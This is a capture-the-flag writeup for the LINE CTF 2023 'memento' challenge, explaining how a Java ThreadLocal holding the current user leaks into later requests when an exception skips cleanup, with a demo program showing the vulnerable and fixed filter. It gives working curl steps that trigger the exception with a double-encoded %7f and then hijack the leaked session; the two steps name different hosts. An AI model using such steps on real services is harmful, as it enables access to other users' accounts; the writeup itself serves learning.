Tags: web exceptions java 

Rating: 0

[https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-linectf-2023.html](https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-linectf-2023.html)

Tl;dr: The application stores the currently logged-in user in a thread-local variable whose lifetime extends beyond a single HTTP request. Normally it is cleared at the end of each request, but if the request throws an exception the clear is skipped, and the next request handled by that thread is still logged in as that user even without their cookie. You can trigger such an exception by reporting a URL containing %7f.
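The mechanism above, as an added example that is not the challenge's code or the original writeup's: a servlet-filter-shaped pipeline simulated on a single-thread pool, so that the second request is guaranteed to reuse the thread of the first. The `Request` record, the `handle` stand-in (which throws on any control character, standing in for the %7f case) and the user names are assumptions for illustration. The vulnerable filter only reaches `remove()` on the success path; the fixed one clears the slot in `finally`.

```java
// Added example, not the challenge's code: shows a ThreadLocal "current user"
// leaking into the next request on the same thread when an exception skips cleanup.
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;

public class MementoDemo {
    // Per-thread "session" slot, the pattern described in the tl;dr.
    private static final ThreadLocal<String> CURRENT_USER = new ThreadLocal<>();

    // Hypothetical request: the user named by the cookie (null if absent) and the path.
    record Request(String cookieUser, String path) {}

    // Stand-in handler (assumption): rejects control characters, as the challenge's %7f did.
    static void handle(Request req) {
        if (req.path().chars().anyMatch(c -> c < 0x20 || c == 0x7f)) {
            throw new IllegalArgumentException("illegal character in path: " + req.path());
        }
    }

    // Vulnerable shape: remove() is only reached when handle() returns normally.
    // Returns the user the application treated as logged in for this request.
    static String vulnerableFilter(Request req) {
        if (req.cookieUser() != null) {
            CURRENT_USER.set(req.cookieUser());
        }
        String who = CURRENT_USER.get();   // whatever the slot holds, cookie or leftover
        handle(req);                       // may throw, skipping the cleanup below
        CURRENT_USER.remove();
        return who;
    }

    // Fixed shape: cleanup in finally, so the slot is empty no matter how the request ends.
    static String fixedFilter(Request req) {
        try {
            if (req.cookieUser() != null) {
                CURRENT_USER.set(req.cookieUser());
            }
            String who = CURRENT_USER.get();
            handle(req);
            return who;
        } finally {
            CURRENT_USER.remove();
        }
    }

    // Serves one request on the pool; returns the user seen, or a marker if the request threw.
    static String serve(ExecutorService pool, Request req, boolean fixed) throws InterruptedException {
        Future<String> f = pool.submit(() -> fixed ? fixedFilter(req) : vulnerableFilter(req));
        try {
            return f.get();
        } catch (ExecutionException e) {
            return "<exception: " + e.getCause().getMessage() + ">";
        }
    }

    public static void main(String[] args) throws Exception {
        // One worker thread, so the probe lands on the poisoned thread every time.
        // A real server has several workers, which is why the writeup repeats the steps.
        ExecutorService pool = Executors.newSingleThreadExecutor();
        try {
            // Constructed requests: a logged-in user's request that throws, then a cookie-less probe.
            Request poison = new Request("victim", "/bin/\u007f");
            Request probe  = new Request(null, "/bin/list");

            System.out.println("vulnerable, poison: " + serve(pool, poison, false));
            System.out.println("vulnerable, probe:  " + serve(pool, probe, false));

            System.out.println("fixed, poison:      " + serve(pool, poison, true));
            System.out.println("fixed, probe:       " + serve(pool, probe, true));
        } finally {
            pool.shutdown();
        }
    }
}
```

Run it with `java MementoDemo.java` (Java 16 or newer, for the record). In the vulnerable path the cookie-less probe is served as the leftover user from the request that threw; with the `finally` cleanup it is served as nobody. The same applies to any per-thread state (MDC entries, security contexts) set by a filter without a `finally`.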

The solution looks like the following. The inner URL is nested inside the outer `urlString` parameter, so it is URL-encoded one more time: `?` becomes `%253f` and the `%7f` that triggers the exception becomes `%257f`.

`curl 'http://176.17.0.1:10000/bin/report?urlString=http://176.17.0.1:10000/bin/report%253furlString=http://176.17.0.1:10000/bin/%257f'`

followed by

`curl 'http://34.84.65.148:31337/bin/list'`

Repeat both steps several times: the server has multiple worker threads, and the `/bin/list` request has to be handled by the thread whose thread-local still holds the leaked user.

Please see [https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-linectf-2023.html](https://blog.bawolff.net/2023/03/ctf-writeup-memento-from-linectf-2023.html) for full details.
